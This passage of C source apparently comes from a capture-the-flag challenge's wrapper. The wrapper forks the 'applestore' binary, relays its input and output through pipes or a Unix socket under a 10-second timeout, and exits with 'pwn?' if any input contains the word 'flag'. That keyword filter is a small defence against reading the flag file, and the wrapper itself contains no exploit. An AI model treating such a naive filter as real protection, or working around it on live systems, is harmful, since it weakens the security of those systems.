66 |             bzero(buf, BUFSIZE);
67 | 
68 |             // hijack output
69 |             n = read(p2[0], buf, BUFSIZE);
70 |             write(1, buf, n);
71 |         }
72 | 
73 |     } else { //child
74 |         close(p1[1]);
75 |         close(p2[0]);
76 |         dup2(p1[0], 0);
77 |         dup2(p2[1], 1);
78 |         execve(exe, NULL, NULL);
79 |     }
80 | 
81 |     return 0;
82 | }
83 | 


--------------------------------------------------------------------------------
/wrapper/wrapper_socket.c:
--------------------------------------------------------------------------------
 1 | #include 
 2 | #include 
 3 | #include 
 4 | #include 
 5 | #include 
 6 | #include 
 7 | #include 
 8 | 
 9 | #define BUFSIZE 1000
10 | #define SOCK_PATH "/tmp/wrapper"
11 | 
12 | char *buf;
13 | 
14 | void quit()
15 | {
16 |     exit(0);
17 | }
18 | 
19 | void timeout()
20 | {
21 |     printf("Times Up!\n");
22 |     fflush(stdout);
23 |     exit(0);
24 | }
25 | 
26 | int main()
27 | {
28 | 
29 |     int pid;
30 | 
31 |     buf = (char*) malloc(BUFSIZE);
32 |     int n;
33 | 
34 |     unlink(SOCK_PATH);
35 |     int s = socket(AF_UNIX, SOCK_STREAM, 0);
36 |     struct sockaddr_un addr;
37 |     memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH));
38 |     addr.sun_family = AF_UNIX;
39 |     bind(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family));
40 |     listen(s, 5);
41 | 
42 |     pid = fork();
43 | 
44 |     if (pid){ //parent
45 |         signal(SIGCHLD, quit);
46 |         signal(SIGALRM, timeout);
47 |         alarm(10);
48 | 
49 |         struct sockaddr_un child;
50 |         int clen = sizeof(child);
51 |         int cs = accept(s, (struct sockaddr *) &child, &clen);
52 | 
53 |         if (cs == -1) {
54 |             fprintf(stderr, "server socket fail\n");
55 |             exit(0);
56 |         }
57 | 
58 |         // get
59 |         n = read(cs, buf, BUFSIZE);
60 |         write(1, buf, n);
61 | 
62 |         while (1) {
63 |             // hijack input
64 |             n = read(0, buf, BUFSIZE);
65 |             if (strstr(buf, "flag")) { // filter
66 |                 fprintf(stderr, "pwn?\n");
67 |                 exit(0);
68 |             }
69 | 
70 |             write(cs, buf, n);
71 |             bzero(buf, BUFSIZE);
72 | 
73 |             // hijack output
74 |             n = read(cs, buf, BUFSIZE);
75 |             write(1, buf, n);
76 |         }
77 | 
78 |     } else { //child
79 |         int s = socket(AF_UNIX, SOCK_STREAM, 0);
80 |         struct sockaddr_un addr;
81 |         bzero(addr.sun_path, sizeof(addr.sun_path));
82 |         memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH));
83 |         addr.sun_family = AF_UNIX;
84 |         connect(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family));
85 |         if (s == -1) {
86 |             fprintf(stderr, "cli socket fail\n");
87 |             exit(0);
88 |         }
89 |         dup2(s, 0);
90 |         dup2(s, 1);
91 |         execve("./applestore", NULL, NULL);
92 |     }
93 | 
94 |     return 0;
95 | }
96 | 


--------------------------------------------------------------------------------